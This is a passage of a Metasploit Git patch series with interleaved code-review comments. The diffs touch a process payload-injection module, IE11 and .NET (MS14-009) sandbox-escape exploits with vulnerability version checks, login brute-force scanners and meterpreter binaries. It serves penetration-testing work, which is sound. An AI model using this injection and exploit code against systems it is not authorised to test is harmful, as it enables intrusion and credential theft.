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 
diff --git a/data/meterpreter/screenshot.x64.dll b/data/meterpreter/screenshot.x64.dll index adbfff46ad544a8107f490492559ee6719c38db0..0958c1e931418c2d6c1397834cd78e3424366043 100755 GIT binary patch delta 42 wcmZqJz|*jSX8|MghJPKCnHhbV(w{d6F}4RWGHwrIWLk6)B)<LoB_>W+09~mNzyJUM delta 42 wcmZqJz|*jSX8|L#gJ!~HW=3BoGn?ih#`Yja#_d6jOp7jp#J7LH#Kh?e01rS73IG5A diff --git a/data/meterpreter/screenshot.x86.dll b/data/meterpreter/screenshot.x86.dll index eb9264e336e1d3efcfbd9ef6bad3163744f9973f..93bf2e177823e083281c34b21c67c1ae336b29a4 100755 GIT binary patch delta 43 xcmZqJz|*jSX8|K~(!Y+$%#6Ow(^y!VgBja{85y?+Gcrwl4wBgZ`~{PwJ^)9Y4}Aat delta 43 xcmZqJz|*jSX8|K~r$)kLW=3D;$q~%W!Hn&}jEviZ8JQ+N2T5#y{(?zT9{??x4j%vj diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild new file mode 100755 index 0000000000..e2ca621d10 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/make.msbuild @@ -0,0 +1,18 @@ +<?xml version="1.0" standalone="yes"?> +<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <PropertyGroup> + <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> + </PropertyGroup> + + <Target Name="all" DependsOnTargets="x86" /> + + <Target Name="x86"> + <Message Text="Building IE11SandboxEscapes x86 Release version" /> + <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> + </Target> + + <Target Name="x64"> + <Message Text="IE11SandboxEscapes not supported in x64" /> + </Target> +</Project> + diff --git a/external/source/exploits/make.bat b/external/source/exploits/make.bat index 38caa762c4..a66e6017bd 100755 --- a/external/source/exploits/make.bat +++ b/external/source/exploits/make.bat @@ -59,6 +59,7 @@ IF "%ERRORLEVEL%"=="0" ( PUSHD bypassuac msbuild.exe make.msbuild /target:%PLAT% POPD + ) IF "%ERRORLEVEL%"=="0" ( 
@@ -68,6 +69,15 @@ IF "%ERRORLEVEL%"=="0" ( POPD ) +) + +IF "%ERRORLEVEL%"=="0" ( + ECHO "Building IE11 Sandbox bypasses" + PUSHD IE11SandboxEscapes + msbuild.exe make.msbuild /target:%PLAT% + POPD +) + FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6% echo Finished %ldt% From 03b4a29662a1b181acb27ab0b708fe7ac0913fe8 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Sat, 31 May 2014 22:17:32 +0200 Subject: [PATCH 440/853] Clarify filedropper error message --- lib/msf/core/exploit/file_dropper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 8ce6cf1a83..8020bf7533 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -122,7 +122,7 @@ module Exploit::FileDropper end @dropped_files.each do |f| - print_warning("This exploit may require manual cleanup of: #{f}") + print_warning("This exploit may require manual cleanup on the target of: #{f}") end end From a4ecd8e02de02085ac8d63b036953c18976e9c56 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:49:56 +0100 Subject: [PATCH 441/853] Should return the thread object --- lib/msf/core/post/windows/process.rb | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb index 2509e9de44..f140e3e669 100644 --- a/lib/msf/core/post/windows/process.rb +++ b/lib/msf/core/post/windows/process.rb @@ -35,10 +35,9 @@ module Process thread = host.thread.create(shell_addr,0) unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread) vprint_error("Unable to create thread") - return false end - true + thread end end # Process 
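Review bot: In `lib/msf/core/post/windows/process.rb` the failure branch no longer leaves the method. With `return false` removed, execution falls through to the final `thread`, so the caller receives whatever `host.thread.create` produced even when it is not a `Thread` object. An explicit early exit, `return nil` directly after `vprint_error("Unable to create thread")`, keeps a falsy failure signal that callers can test. The follow-up hunk in patch 444 adds a bare `nil` on that branch; it is evaluated and discarded, so the behaviour stays the same there. The method's signature and the code that opens the process are outside this hunk.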
From 4801a7fca00e601adefcbdbd6ee18c1fd0920291 Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:50:13 +0100 Subject: [PATCH 442/853] Allow x86->x64 injection --- .../exploits/windows/local/payload_inject.rb | 35 +++---------------- 1 file changed, 5 insertions(+), 30 deletions(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 0b7a26f357..069994534a 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -10,6 +10,8 @@ require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking + include Msf::Core::Post::Windows::Process + def initialize(info={}) super( update_info( info, 'Name' => 'Windows Manage Memory Payload Injection', @@ -52,13 +54,7 @@ class Metasploit3 < Msf::Exploit::Local return end - if @payload_arch.first =~ /64/ and client.platform =~ /x86/ - print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.") - print_error("Migrate to an x64 process and try again.") - return false - else - inject_into_pid(pid) - end + inject_into_pid(pid) end # Figures out which PID to inject to @@ -83,8 +79,6 @@ class Metasploit3 < Msf::Exploit::Local return false end - pids = [] - procs.each do |p| found_pid = p['pid'] return true if found_pid == pid 
@@ -144,27 +138,8 @@ class Metasploit3 < Msf::Exploit::Local begin print_status("Preparing '#{@payload_name}' for PID #{pid}") - raw = payload.generate - - print_status("Opening process #{pid.to_s}") - host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) - if not host_process - print_error("Unable to open #{pid.to_s}") - return - end - - print_status("Allocating memory in procees #{pid}") - mem = host_process.memory.allocate(raw.length + (raw.length % 1024)) - - # Ensure memory is set for execution - host_process.memory.protect(mem) - - print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager") - print_status("Writing the stager into memory...") - host_process.memory.write(mem, raw) - host_process.thread.create(mem, 0) - print_good("Successfully injected payload in to process: #{pid}") - + raw = payload.encoded + execute_shellcode(raw, nil, pid) rescue Rex::Post::Meterpreter::RequestError => e print_error("Unable to inject payload:") print_line(e.to_s) From 3c5fae370614431cb818611b4cabc9bc15e2bcae Mon Sep 17 00:00:00 2001 From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:51:06 +0100 Subject: [PATCH 443/853] Use correct include --- modules/exploits/windows/local/payload_inject.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/payload_inject.rb b/modules/exploits/windows/local/payload_inject.rb index 069994534a..76506a500e 100644 --- a/modules/exploits/windows/local/payload_inject.rb +++ b/modules/exploits/windows/local/payload_inject.rb @@ -10,7 +10,7 @@ require 'msf/core/exploit/exe' class Metasploit3 < Msf::Exploit::Local Rank = ExcellentRanking - include Msf::Core::Post::Windows::Process + include Msf::Post::Windows::Process def initialize(info={}) super( update_info( info, From f0e9a9010ed96d527a7c2312f56372c846445b78 Mon Sep 17 00:00:00 2001 
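Review bot: The return value of `execute_shellcode(raw, nil, pid)` is discarded, and this hunk removes every status line that reported the outcome. As far as the `process.rb` hunks in this series show, the helper reports a failed thread creation only through `vprint_error` and its return value, so without verbose output the module ends silently on both success and failure. Capturing the result, `thread = execute_shellcode(raw, nil, pid)`, and following it with `print_error("Unable to inject payload into PID #{pid}") unless thread` restores the visible status. That check is only meaningful once the helper returns a falsy value on failure. The enclosing method starts before the hunk and its `rescue` clause continues after it.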
From: Meatballs <eat_meatballs@hotmail.co.uk> Date: Sun, 1 Jun 2014 11:55:40 +0100 Subject: [PATCH 444/853] Return nil if fail --- lib/msf/core/post/windows/process.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/msf/core/post/windows/process.rb b/lib/msf/core/post/windows/process.rb index f140e3e669..53a4e1e3f3 100644 --- a/lib/msf/core/post/windows/process.rb +++ b/lib/msf/core/post/windows/process.rb @@ -35,6 +35,7 @@ module Process thread = host.thread.create(shell_addr,0) unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread) vprint_error("Unable to create thread") + nil end thread From 8346e20bf14a37c7622dd4afe4efc72a2a912c6a Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Sun, 1 Jun 2014 21:27:07 +1000 Subject: [PATCH 445/853] Change memory types from DWORD to QWORD This was causing memory allocations to fail on x64 in cases where the higher bits were set in addresses. --- lib/rex/post/meterpreter/extensions/stdapi/tlv.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb index a20b0b1993..b56f22a102 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb 
@@ -125,12 +125,12 @@ TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102 DELETE_KEY_FLAG_RECURSIVE = (1 << 0) # Process -TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000 +TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2000 TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001 TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002 TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003 TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004 -TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005 +TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_QWORD | 2005 TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006 TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007 TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008 From 31af8ef07b99f4a82c62a69609ba5e242f9802af Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Sun, 1 Jun 2014 20:58:08 -0500 Subject: [PATCH 446/853] Check .NET version --- .../windows/local/ms14_009_ie_dfsvc.rb | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index aebb4529cd..5d705751d5 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -15,8 +15,20 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::EXE include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv + include Msf::Post::Windows::FileInfo include Msf::Post::File + NET_VERSIONS = { + '4.5' => { + 'dfsvc' => '4.0.30319.17929.17', + 'mscorlib' => '4.0.30319.18063.18' + }, + '4.5.1' => { + 'dfsvc' => '4.0.30319.18408.18', + 'mscorlib' => '4.0.30319.18444.18' + } + } + def initialize(info={}) super( update_info( info, 'Name' => 'MS14-009 .NET Deployment Service IE Sandbox Escape', 
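Review bot: `TLV_TYPE_BASE_ADDRESS` and `TLV_TYPE_ALLOC_BASE_ADDRESS` have the meta type OR'd into the constant, so switching `TLV_META_TYPE_UINT` to `TLV_META_TYPE_QWORD` changes the identifier on the wire as well as the width. Both ends of the channel have to be updated together, and this hunk shows only the Ruby side. It is worth confirming that the native extension reads and writes these two fields as QWORD. A comment above the pair would stop a later edit from reverting them to UINT alongside their neighbours, for example `# Pointer-sized: QWORD so x64 addresses with high bits set are not truncated; must match the native stdapi definitions`.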
@@ -69,10 +81,44 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, "Not running at Low Integrity") end + print_status("Searching .NET Deployment Service (dfsvc.exe)...") + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end + dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + dfsvc_version = dfsvc_version.join(".") + + net_version = "" + + NET_VERSIONS.each do |k,v| + if v["dfsvc"] == dfsvc_version + net_version = k + end + end + + if net_version.empty? + fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") + end + + print_good(".NET Deployment Service from .NET #{net_version} found.") + + print_status("Checking if .NET is patched...") + + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") + end + + mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + mscorlib_version = mscorlib_version.join(".") + + unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") + end + + print_good(".NET looks vulnerable, exploiting...") + begin Timeout.timeout(datastore['DELAY']) { super } rescue Timeout::Error From d0241cf4c18378c70ca553bc764f62d4cb027f40 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Mon, 2 Jun 2014 08:14:40 -0500 Subject: [PATCH 447/853] Add check method --- .../windows/local/ms14_009_ie_dfsvc.rb | 58 +++++++++++++++---- 1 file changed, 46 insertions(+), 12 deletions(-) 
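Review bot: `mscorlib_version < NET_VERSIONS[net_version]["mscorlib"]` compares two dotted version strings lexicographically, so the result follows character order rather than the numeric build. A constructed example is `"4.0.30319.2034.0" < "4.0.30319.18063.18"`, which is false although 2034 is the lower build. The patch-level decision can therefore go wrong in either direction. Comparing parsed versions avoids this: `Gem::Version.new(mscorlib_version) < Gem::Version.new(NET_VERSIONS[net_version]['mscorlib'])`. The same string comparison is repeated in the `check` method added by patch 447, and `exploit` begins before this hunk and continues after it.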
diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 5d705751d5..c731b39ea4 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -69,6 +69,50 @@ class Metasploit3 < Msf::Exploit::Local ]) end + def check + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + return Exploit::CheckCode::Unknown + end + + net_version = get_net_version + + if net_version.empty? + return Exploit::CheckCode::Unknown + end + + unless file_exist?("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + return Exploit::CheckCode::Detected + end + + mscorlib_version = get_mscorlib_version + + unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] + return Exploit::CheckCode::Safe + end + + Exploit::CheckCode::Vulnerable + end + + def get_net_version + net_version = "" + + dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") + dfsvc_version = dfsvc_version.join(".") + + NET_VERSIONS.each do |k,v| + if v["dfsvc"] == dfsvc_version + net_version = k + end + end + + net_version + end + + def get_mscorlib_version + mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") + mscorlib_version.join(".") + end + def exploit print_status("Running module against #{sysinfo['Computer']}") unless sysinfo.nil? 
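Review bot: `get_net_version` and `get_mscorlib_version` call `.join(".")` directly on the value returned by `file_version`. If that helper can return nil when the version resource cannot be read (its definition is not visible here), `check` would raise `NoMethodError` instead of returning a check code. A guard such as `return "" if dfsvc_version.nil?` before the join keeps `check` on its `Unknown` path; `get_mscorlib_version` needs the equivalent. Separately, the `NET_VERSIONS.each` loop keeps scanning after a match, whereas `NET_VERSIONS.find { |_, v| v['dfsvc'] == dfsvc_version }` expresses the lookup directly.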
@@ -87,16 +131,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, ".NET Deployment Service (dfsvc.exe) not found") end - dfsvc_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe") - dfsvc_version = dfsvc_version.join(".") - - net_version = "" - - NET_VERSIONS.each do |k,v| - if v["dfsvc"] == dfsvc_version - net_version = k - end - end + net_version = get_net_version if net_version.empty? fail_with(Failure::NotVulnerable, "This module only targets .NET Deployment Service from .NET 4.5 and .NET 4.5.1") @@ -110,8 +145,7 @@ class Metasploit3 < Msf::Exploit::Local fail_with(Failure::NotVulnerable, ".NET Installation can not be verified (mscorlib.dll not found)") end - mscorlib_version = file_version("#{get_env("windir")}\\Microsoft.NET\\Framework\\v4.0.30319\\mscorlib.dll") - mscorlib_version = mscorlib_version.join(".") + mscorlib_version = get_mscorlib_version unless mscorlib_version < NET_VERSIONS[net_version]["mscorlib"] fail_with(Failure::NotVulnerable, ".NET Installation not vulnerable") From 428df197396fbdb549f71af263566538ce1b1908 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer <FireFart@gmail.com> Date: Mon, 2 Jun 2014 17:28:09 +0200 Subject: [PATCH 448/853] Changed message --- lib/msf/core/exploit/file_dropper.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/exploit/file_dropper.rb b/lib/msf/core/exploit/file_dropper.rb index 8020bf7533..6a658243b0 100644 --- a/lib/msf/core/exploit/file_dropper.rb +++ b/lib/msf/core/exploit/file_dropper.rb @@ -122,7 +122,7 @@ module Exploit::FileDropper end @dropped_files.each do |f| - print_warning("This exploit may require manual cleanup on the target of: #{f}") + print_warning("This exploit may require manual cleanup of '#{f}' on the target") end end From b7dc89f56924130e5087273112b9680fe2d8bba1 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 13:09:46 -0500 Subject: [PATCH 449/853] I prefer "bruteforce" to "brute force" for search Just makes it easier to search for, since it's an industry term of art. --- modules/auxiliary/scanner/http/etherpad_duo_login.rb | 6 +++--- modules/auxiliary/scanner/http/pocketpad_login.rb | 6 +++--- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/etherpad_duo_login.rb b/modules/auxiliary/scanner/http/etherpad_duo_login.rb index f17d451bee..66371cc7d1 100644 --- a/modules/auxiliary/scanner/http/etherpad_duo_login.rb +++ b/modules/auxiliary/scanner/http/etherpad_duo_login.rb @@ -13,10 +13,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => 'EtherPAD Duo Login Brute Force Utility', + 'Name' => 'EtherPAD Duo Login Bruteforce Utility', 'Description' => %{ This module scans for EtherPAD Duo login portal, and - performs a login brute force attack to identify valid credentials. + performs a login bruteforce attack to identify valid credentials. }, 'Author' => [ @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("#{peer} - Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end diff --git a/modules/auxiliary/scanner/http/pocketpad_login.rb b/modules/auxiliary/scanner/http/pocketpad_login.rb index 1a7dc9da52..a1a5b75f56 100644 --- a/modules/auxiliary/scanner/http/pocketpad_login.rb +++ b/modules/auxiliary/scanner/http/pocketpad_login.rb 
@@ -14,10 +14,10 @@ class Metasploit3 < Msf::Auxiliary def initialize(info={}) super(update_info(info, - 'Name' => 'PocketPAD Login Brute Force Utility', + 'Name' => 'PocketPAD Login Bruteforce Force Utility', 'Description' => %{ This module scans for PocketPAD login portal, and - performs a login brute force attack to identify valid credentials. + performs a login bruteforce attack to identify valid credentials. }, 'Author' => [ @@ -32,7 +32,7 @@ class Metasploit3 < Msf::Auxiliary return end - print_status("#{peer} - Starting login brute force...") + print_status("#{peer} - Starting login bruteforce...") each_user_pass do |user, pass| do_login(user, pass) end From ea383b41393b22b84099e3edb05056eda34575e7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley <tod_beardsley@rapid7.com> Date: Mon, 2 Jun 2014 13:20:01 -0500 Subject: [PATCH 450/853] Make print/descs/case consistent --- .../multi/elasticsearch/script_mvel_rce.rb | 21 ++++++------- modules/post/windows/gather/enum_muicache.rb | 30 +++++++++---------- 2 files changed, 26 insertions(+), 25 deletions(-) diff --git a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb index 4cea8269d3..5012a8239d 100644 --- a/modules/exploits/multi/elasticsearch/script_mvel_rce.rb +++ b/modules/exploits/multi/elasticsearch/script_mvel_rce.rb 
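Review bot: The new module name reads `'PocketPAD Login Bruteforce Force Utility'`; the word "Force" was left behind when "Brute Force" was joined into one word. The name therefore no longer parallels the EtherPAD module renamed in the same patch, and a search for the intended title will not match it exactly. It should be `'Name' => 'PocketPAD Login Bruteforce Utility',`.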
